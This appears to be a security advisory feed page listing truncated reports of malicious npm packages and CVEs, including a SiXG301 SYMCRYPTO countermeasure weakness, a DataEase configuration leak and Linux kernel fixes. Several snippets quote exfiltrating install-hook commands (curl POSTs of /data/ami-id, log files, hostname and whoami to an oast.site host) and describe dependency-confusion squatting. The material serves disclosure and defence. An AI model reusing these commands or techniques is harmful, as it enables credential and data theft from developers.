Malicious code in dttfdsdee (npm)

--- -= Per source details. Do not edit below this line.=- Source: amazon-inspector 7f61e9b10455dc3781fcee5dfb2654ff824c2ac2e51dfaf7ebfba342f570f66c package.json declares a postinstall lifecycle script that runs on every npm install: curl -X POST -d "$cat /data/ami-id"...

CVE-2026-4930

SYMCRYPTO is the SiXG301's host side hardware engine accessed by PSA crypto library that accelerates symmetric cryptographic operations AES encryption/decryption and hashing. DPA Countermeasures on SYMCRYPTO can be weakened reduced entropy by forcing certain seed values if an attacker gains code...

CVE-2026-4930

CVE-2026-4930 concerns SIxG301’s SYMCRYPTO, a host-side hardware engine exposed to the PSA Crypto library to accelerate symmetric operations (AES and hashing). The reported issue is that DPA countermeasures on SYMCRYPTO can be weakened by forcing certain seed values if an attacker achieves code e...

EUVD-2026-39534

SYMCRYPTO is the SiXG301's host side hardware engine accessed by PSA crypto library that accelerates symmetric cryptographic operations AES encryption/decryption and hashing. DPA Countermeasures on SYMCRYPTO can be weakened reduced entropy by forcing certain seed values if an attacker gains code...

CVE-2026-4930 DPA Countermeasures weakening on Series 3 devices

SYMCRYPTO is the SiXG301's host side hardware engine accessed by PSA crypto library that accelerates symmetric cryptographic operations AES encryption/decryption and hashing. DPA Countermeasures on SYMCRYPTO can be weakened reduced entropy by forcing certain seed values if an attacker gains code...

Malicious code in gx-npm-feature-flags (npm)

--- -= Per source details. Do not edit below this line.=- Source: amazon-inspector 7fcad1b944d9ceb92389673398df9f471911a788fe608774a3298c69900bb1c7 [email protected] is a dependency-confusion squat max-semver 99.99.99 on a gx--prefixed name to outrank a private internal package that...

Malicious code in dttsdee (npm)

--- -= Per source details. Do not edit below this line.=- Source: amazon-inspector 56d01c47d29d1f8f25a737be42dd77d02a2c13a00afb808740142197a79150e9 package.json declares a postinstall lifecycle script that runs automatically on npm install: curl -X POST -d "$cat /data/logs/monitor-2026-06-25.log"...

Malicious code in dddooo (npm)

--- -= Per source details. Do not edit below this line.=- Source: amazon-inspector 31763ebf0ebdd35b636e728b408f41ff8852cddeb34db5e188dc17c8374c6948 package.json declares a postinstall lifecycle script that runs automatically on npm install: curl -X POST -d "$cat /data/logs/monitor-2026-06-16.log"...

MAL-2026-6460 Malicious code in dddooo (npm)

--- -= Per source details. Do not edit below this line.=- Source: amazon-inspector 31763ebf0ebdd35b636e728b408f41ff8852cddeb34db5e188dc17c8374c6948 package.json declares a postinstall lifecycle script that runs automatically on npm install: curl -X POST -d "$cat /data/logs/monitor-2026-06-16.log"...

MAL-2026-6459 Malicious code in easy-string-kit (npm)

--- -= Per source details. Do not edit below this line.=- Source: amazon-inspector 8cb77d96cfd133340395df1765df2426f8414d80158e62ee5832ab6d4a18e803 package.json declares a postinstall lifecycle script that automatically runs on npm install and executes roughly 25 curl POST requests harvesting...

DataEase <= 2.4.1 - Sensitive Information Exposure

DataEase, an open source data visualization and analysis tool, has a database configuration information exposure vulnerability prior to version 2.5.0. Visiting the /de2api/engine/getEngine;.js path via a browser reveals that the platform's database configuration is returned. id: CVE-2024-30269...

Malicious code in serverless-convention (npm)

The serverless-convention npm package was compromised as part of the Miasma worm campaign targeting the LeoPlatform npm ecosystem. On June 24, 2026, 20 LeoPlatform packages were published within a 3-second window by a threat actor who had taken over the npm account czirker belonging to the...

EUVD-2025-210305

picklescan before 0.0.29 fails to detect the profile.Profile.runctx function when analyzing pickle files, allowing attackers to embed undetected malicious code. Remote attackers can craft malicious pickle files using profile.Profile.runctx in the reduce method to achieve remote code execution whe...

MAL-2026-6249 Malicious code in blinkit-core (npm)

--- -= Per source details. Do not edit below this line.=- Source: amazon-inspector 2ca70b0a6be36daf245deb50dd6b3595a9bfba29c62770e82365152a02832cf8 On npm install, the package's preinstall lifecycle hook runs curl against http://d8s0b82plbq3u5sb2vo0sb3a9obr4yjt7.oast.site/ and POSTs the installer...

MAL-2026-6254 Malicious code in zomato-sushi (npm)

--- -= Per source details. Do not edit below this line.=- Source: amazon-inspector 6f631d7af366bbb607f9088550a64939e395d0ce1199777828269de5772d860c package.json declares a preinstall script that runs curl with form-encoded fields carrying the installer's hostname hostname -f, whoami, current...

Malicious code in zomato-sushi (npm)

--- -= Per source details. Do not edit below this line.=- Source: amazon-inspector 6f631d7af366bbb607f9088550a64939e395d0ce1199777828269de5772d860c package.json declares a preinstall script that runs curl with form-encoded fields carrying the installer's hostname hostname -f, whoami, current...

MAL-2026-6251 Malicious code in zomato-config (npm)

--- -= Per source details. Do not edit below this line.=- Source: amazon-inspector 3a1b48a397992964f8f3982dc69a33431bfb26c911c29a1e5d124581cef46a40 Dependency-confusion package targeting an internal Zomato namespace. The package ships only a stub index.js module.exports = name: 'zomato-config',...

Malicious code in @bytemend/mfebus (npm)

--- -= Per source details. Do not edit below this line.=- Source: amazon-inspector b3d53776853d18aabf967b0f1882eb45f2164feedd600eeccc927f496002f5e4 The package advertises itself as a small in-memory pubsub library but its main entry dist/index.js eagerly requires dist/bootstrap.js, a 277KB...

Astra Linux – Vulnerability in Linux 5.10

In the Linux kernel, the following vulnerability has been resolved: Ring-Buffer: Fixed the possibility of dereferencing an uninitialized pointer. There is a pointer called headpage in the function rbmetavalidateevents. This pointer is not initialized at the beginning of the function. This pointer...

Astra Linux – Vulnerability found in Linux 5.10, Linux 6.1, Linux, Linux 5.15

In the Linux kernel, the following vulnerability has been resolved: media: dvbdev: The risk of out-of-memory access has been prevented. The dvbdev module contains a static variable used to store dvb minors. Its behavior depends on whether CONFIGDVBDYNAMICMINORS is set or not. When it is not set,...